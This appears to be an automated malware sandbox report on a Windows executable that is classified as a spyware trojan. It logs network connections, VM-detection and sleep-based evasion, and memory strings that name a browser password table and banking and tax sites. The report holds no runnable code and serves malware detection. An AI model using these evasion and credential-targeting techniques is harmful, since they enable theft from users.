Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49738 version: TLS 1.2

Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_001741B0	0_2_001741B0
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00186A20	0_2_00186A20
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00174BD0	0_2_00174BD0
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00173D40	0_2_00173D40
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00183810	0_2_00183810
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00171000	0_2_00171000
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_0018B040	0_2_0018B040
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00176090	0_2_00176090
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_0017A8A0	0_2_0017A8A0
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00177140	0_2_00177140
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_0017B140	0_2_0017B140
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00175960	0_2_00175960
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_0018D980	0_2_0018D980
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_0017E1F0	0_2_0017E1F0
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_001831F0	0_2_001831F0
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00178A00	0_2_00178A00
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00179A30	0_2_00179A30
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_0018BA20	0_2_0018BA20
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_0018CA60	0_2_0018CA60
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00179280	0_2_00179280
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_0018C280	0_2_0018C280
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_0019CAA0	0_2_0019CAA0
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_001852F0	0_2_001852F0
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_001A92E9	0_2_001A92E9
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00177B30	0_2_00177B30
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_0018E340	0_2_0018E340
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_0017BB70	0_2_0017BB70
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00197390	0_2_00197390
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00176410	0_2_00176410
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_0018AC20	0_2_0018AC20
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00187420	0_2_00187420
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00186C50	0_2_00186C50
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00179C40	0_2_00179C40
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00186440	0_2_00186440
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00175C90	0_2_00175C90
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_0017A480	0_2_0017A480
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_0017C4F0	0_2_0017C4F0
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_0018BCF0	0_2_0018BCF0
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00172500	0_2_00172500
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_001AB532	0_2_001AB532
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_0017AD70	0_2_0017AD70
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00173560	0_2_00173560
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_0017E5D0	0_2_0017E5D0
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00172DE0	0_2_00172DE0
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_0018B600	0_2_0018B600
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00189E50	0_2_00189E50
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_0017FE40	0_2_0017FE40
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00182E40	0_2_00182E40
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00175670	0_2_00175670
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00187E70	0_2_00187E70
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_0019E689	0_2_0019E689
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00177E80	0_2_00177E80
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_001826B0	0_2_001826B0
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_0018DEA0	0_2_0018DEA0
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_001766F0	0_2_001766F0
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00176F00	0_2_00176F00
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_0018A720	0_2_0018A720
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00172750	0_2_00172750
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00184740	0_2_00184740
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00195F91	0_2_00195F91
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00178780	0_2_00178780
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_0017BFB0	0_2_0017BFB0
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00185FA0	0_2_00185FA0
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_0018CFF0	0_2_0018CFF0
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_033CE943	3_3_033CE943
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_033CEC79	3_3_033CEC79

Source: C:\Users\user\Desktop\1fxm3u0d.exe

Code function: String function: 001912C0 appears 52 times

Source: C:\Users\user\Desktop\1fxm3u0d.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 304

Source: 1fxm3u0d.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 1fxm3u0d.exe

Static PE information: Section: .right ZLIB complexity 1.0003399527914614

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/6@11/2

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2584:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4368

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\6cf7f9bd-0edb-4191-a81e-0925af280bf6

Jump to behavior

Source: 1fxm3u0d.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\1fxm3u0d.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 1fxm3u0d.exe, 00000003.00000003.2193488612.0000000005A75000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2230939158.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A57000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 1fxm3u0d.exe	Virustotal: Detection: 57%
Source: 1fxm3u0d.exe	ReversingLabs: Detection: 68%

Source: C:\Users\user\Desktop\1fxm3u0d.exe

File read: C:\Users\user\Desktop\1fxm3u0d.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\1fxm3u0d.exe "C:\Users\user\Desktop\1fxm3u0d.exe"
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Process created: C:\Users\user\Desktop\1fxm3u0d.exe "C:\Users\user\Desktop\1fxm3u0d.exe"
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 304
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Process created: C:\Users\user\Desktop\1fxm3u0d.exe "C:\Users\user\Desktop\1fxm3u0d.exe"	Jump to behavior

Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: 1fxm3u0d.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE

Source: 1fxm3u0d.exe

Static PE information: section name: .right

Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_00173D40 push eax; ret	0_2_00173FA5
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_0019147A push ecx; ret	0_2_0019148D
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_03428AD9 push cs; ret	3_3_03428ADA
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_03428AD9 push cs; ret	3_3_03428ADA
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_03428AD9 push cs; ret	3_3_03428ADA
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_03428AD9 push cs; ret	3_3_03428ADA
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_03428AD9 push cs; ret	3_3_03428ADA
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_034271EA push ecx; retf	3_3_03427210
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_034271EA push ecx; retf	3_3_03427210
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_034271EA push ecx; retf	3_3_03427210
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_034271EA push ecx; retf	3_3_03427210
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_034271EA push ecx; retf	3_3_03427210
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_03423D39 push 00000054h; retf	3_3_03423D5D
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_03423D39 push 00000054h; retf	3_3_03423D5D
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_03423D39 push 00000054h; retf	3_3_03423D5D
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_03428AD9 push cs; ret	3_3_03428ADA
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_03428AD9 push cs; ret	3_3_03428ADA
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_03428AD9 push cs; ret	3_3_03428ADA
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_03428AD9 push cs; ret	3_3_03428ADA
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_03428AD9 push cs; ret	3_3_03428ADA
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_034271EA push ecx; retf	3_3_03427210
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_034271EA push ecx; retf	3_3_03427210
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_034271EA push ecx; retf	3_3_03427210
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_034271EA push ecx; retf	3_3_03427210
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_034271EA push ecx; retf	3_3_03427210
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_03423D39 push 00000054h; retf	3_3_03423D5D
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_03423D39 push 00000054h; retf	3_3_03423D5D
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_03423D39 push 00000054h; retf	3_3_03423D5D
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_03428AD9 push cs; ret	3_3_03428ADA
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_03428AD9 push cs; ret	3_3_03428ADA
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 3_3_03428AD9 push cs; ret	3_3_03428ADA

Source: 1fxm3u0d.exe

Static PE information: section name: .text entropy: 6.952656508969145

Source: C:\Users\user\Desktop\1fxm3u0d.exe

Code function: 0_2_00191810 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00191810

Source: C:\Users\user\Desktop\1fxm3u0d.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\1fxm3u0d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\1fxm3u0d.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\1fxm3u0d.exe TID: 6604	Thread sleep time: -270000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\1fxm3u0d.exe TID: 1480	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\1fxm3u0d.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_001A5898 FindFirstFileExW,		0_2_001A5898
Source: C:\Users\user\Desktop\1fxm3u0d.exe	Code function: 0_2_001A5949 FindFirstFileExW,FindNextFileW,FindClose,FindClose,		0_2_001A5949

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: 1fxm3u0d.exe, 00000003.00000003.2231439928.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: 1fxm3u0d.exe, 1fxm3u0d.exe, 00000003.00000003.2280756454.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165613383.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2308206349.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000002.2386763514.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2370076676.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2381261813.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2280589839.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2320693548.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2167175724.00000000033BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 1fxm3u0d.exe, 00000003.00000003.2231799802.0000000005B32000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
